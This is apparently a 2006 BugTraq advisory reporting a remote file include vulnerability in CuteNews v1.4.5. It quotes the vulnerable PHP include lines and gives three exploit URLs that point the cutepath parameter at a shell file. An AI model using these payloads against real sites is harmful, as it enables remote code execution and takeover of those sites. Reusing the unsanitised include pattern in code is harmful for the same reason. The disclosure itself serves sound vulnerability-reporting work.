BugTraq
CuteNews v1.4.5 (search.php) Remote file include vulnerability Nov 26 2006 11:08PM
philip anselmo (spoonman500 hotmail com) (2 replies)
Title : CuteNews v1.4.5 (search.php) Remote file include
########################################################################

#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------

Sorce Code:
**********
http://cutephp.com/

Affected software description :
******************************
vendor site: http://cutephp.com/
Application : CuteNews v1.4.5
Catégorie :Remote File Include
------------------------------------------------------------------------

Vulnerable Code:
***************
require_once("$cutepath/inc/functions.inc.php");
require_once("$cutepath/data/config.php");

affected file: search.php & show_news.php & show_archives.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt
?
http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?

------------------------------------------------------------------------

----

greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends

Special Greeting:AsbMay's Group & TrYaG TeaM

channel:www.asb-may.net & www.tryag.com

contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg (at) hotmail (dot) com [email concealed]

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp

[ reply ]
Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability Nov 28 2006 10:58AM
raven (locrideweb libero it)
Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability Nov 27 2006 08:49PM
Francesco Laurita (francesco francesco-laurita info)


 

Privacy Statement
Copyright 2010, SecurityFocus